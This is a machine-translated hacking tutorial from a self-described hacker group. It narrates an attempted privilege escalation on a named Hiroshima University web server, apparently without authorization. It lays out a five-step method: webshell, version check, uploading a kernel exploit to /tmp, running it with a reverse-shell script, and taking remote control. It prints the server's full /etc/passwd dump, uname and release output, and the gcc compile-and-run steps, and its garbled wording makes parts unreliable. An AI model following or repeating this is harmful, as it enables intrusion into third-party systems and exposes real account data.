Linux penetration and Security Section 3-Elevation of Privilege

Some people have always thought that Elevation of Privilege in Linux is an advanced technology. In fact, Elevation of Privilege in Linux is not mysterious. To sum up the steps, you can simply divide them into five steps:
1. Obtain webshell
2. You have the permission to execute command line and obtain the Linux system version.
3. Upload the vulnerability elevation script corresponding to the Linux system version to the writable executable directory.
4. Execute the Privilege Escalation script and the bounce connection script.
5. remotely control the machine using command line
Author: YoCo Smart
From: Silic Group Hacker Army
Http://blackbap.org
The example used in this article is still the server of the Hiroshima University Institute, but so far I have not initiated the right, although it is not a successful example, however, the purpose of this article is to explain the process rather than the results.
The website Server SETUP environment of the Hiroshima University Institute is:
Cent OS + PHP + Apache + PsotgreSQL
Of course, this is not important. I have obtained webshell and found that I have permissions for exec and system functions.
First, read the password file: cat/etc/passwd
Copy the code to obtain: root: x: 0: 0: root:/bin/bash.

Bin: x: 1: 1: bin:/sbin/nologin

Daemon: x: 2: 2: daemon:/sbin/nologin

Adm: x: 3: 4: adm:/var/adm:/sbin/nologin

Lp: x: 4: 7: lp:/var/spool/lpd:/sbin/nologin

Sync: x: 5: 0: sync:/sbin:/bin/sync

Shutdown: x: 6: 0: shutdown:/sbin/shutdown

Halt: x: 7: 0: halt:/sbin/halt

Mail: x: 8: 12: mail:/var/spool/mail:/sbin/nologin

News: x: 9: 13: news:/etc/news:

Uucp: x: 10: 14: uucp:/var/spool/uucp:/sbin/nologin

Operator: x: 11: 0: operator:/root:/sbin/nologin

Games: x: 12: 100: games:/usr/games:/sbin/nologin

Gopher: x: 13: 30: gopher:/var/gopher:/sbin/nologin

Ftp: x: 14: 50: FTP User:/var/ftp:/sbin/nologin

Nobody: x: 99: 99: Nobody: // sbin/nologin

Rpm: x: 37: 37:/var/lib/rpm:/sbin/nologin

Messages: x: 81: 81: System message bus: // sbin/nologin

Avahi: x: 70: 70: Avahi daemon: // sbin/nologin

Mailnull: x: 47: 47:/var/spool/mqueue:/sbin/nologin

Smmsp: x: 51: 51:/var/spool/mqueue:/sbin/nologin

Nscd: x: 28: 28: NSCD Daemon: // sbin/nologin

Vcsa: x: 69: 69: virtual console memory owner:/dev:/sbin/nologin

Rpc: x: 32: 32: Portmapper RPC user: // sbin/nologin

Sshd: x: 74: 74: Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

Rpcuser: x: 29: 29: RPC Service User:/var/lib/nfs:/sbin/nologin

Nfsnobody: x: 65534: 65534: Anonymous NFS User:/var/lib/nfs:/sbin/nologin

Apache: x: 48: 48: Apache:/var/www:/sbin/nologin

Pcap: x: 77: 77:/var/arpwatch:/sbin/nologin

Haldaemon: x: 68: 68: HAL daemon: // sbin/nologin

Distcache: x: 94: 94: Distcache: // sbin/nologin

S: x: 26: 26: PostgreSQL Server:/var/lib/pgsql:/bin/bash

Webalizer: x: 67: 67: Webalizer:/var/www/usage:/sbin/nologin

Squid: x: 23: 23:/var/spool/squid:/sbin/nologin

Xfs: x: 43: 43: X Font Server:/etc/X11/fs:/sbin/nologin

Ope: x: 500: 500:/home/ope:/bin/bash

Ntp: x: 38: 38:/etc/ntp:/sbin/nologin

Oprofile: x: 16: 16: Special user account to be used by OProfile:/home/oprofile:/sbin/nologin

Avahi-autoipd: x: 100: 104: avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
In addition to root, the shell with bash permission has
Database account line32: postgres
The Administrator's account line36: ope
Apache is the shell of nologin. Of course, this does not seem to affect anything, just look at it.
By the way, 10:45:41 up 71 days, 1 user, load average: 2.00, 2.00, 2.00

User tty from login @ IDLE JCPU PCPU WHAT

Ope tty1-26Jan11 71 days 0.03 s 0.03 s-bash
Copy the code. Click Finish. Start Business
Run the command: uname-

Echo:

Linux XXXXXXXX.hiroshima-u.ac.jp 2.6.18-164.15.1.el5PAE #1 SMP Wed Mar 17 12:14:29 EDT 2010 i686 i686 i386 GNU/Linux
Copy the kernel of code 2.6.18 and then look at lsb_release-.

Echo:

LSB Version: core-3.1-ia32: core-3.1-noarch: graphics-3.1-ia32: graphics-3.1-noarch

Distributor ID: CentOS

Description: CentOS release 5.4 (Final)

Release: 5.4

Codename: Final
The system that copies the code Cent OS 5.4 is indeed 2.6.18 kernel. However, no vulnerabilities have been found in this RedHat system --
Upload a privilege escalation script from 2.6.18 last year to the/tmp directory.
Note: Generally, the Elevation of Privilege scripts are stored in the/tmp directory. The reason is very simple. The directory is simple and executable ~ Name: 2618.c
Well, before permission escalation, This Is A c file and cannot be directly executed in the same way as rb or pl. We need to compile it first: gcc-o/tmp/2618/tmp/2618.c
Copy the code to compile/tmp/2618. c into a Executable File/tmp/2618.
Now you can directly execute this file/tmp/2618
Of course, the echo prompt fails to copy the code.

Diagnostic tool for public CVE-2010-3081 exploit -- Ksplice, Inc.
(See http://www.ksplice.com/uptrack/cve-2010-3081)

$ Kernel release: 2.6.18-164.15.1.el5PAE
$ Backdoor in LSM (1/3): checking... not present.
$ Backdoor in timer_list_fops (2/3): not available.
$ Backdoor in IDT (3/3): checking... not present.

Your system is free from the backdoors that wocould be left in memory
By the published exploit for CVE-2010-3081.

Of course, it is not wise to directly escalate the kernel privilege for the Linux System Version released by RedHat. My idea is to find software and drivers with vulnerabilities in the system and use them to escalate permissions. Unfortunately, I haven't succeeded yet --
Conclusion: There are two points to note in the Elevation of Privilege script. Compiling the gcc command cannot compile the script, which may be a problem in the c script itself. If the system cannot output executable files from gcc, it can be locally or elsewhere, and then directly transmitted to execute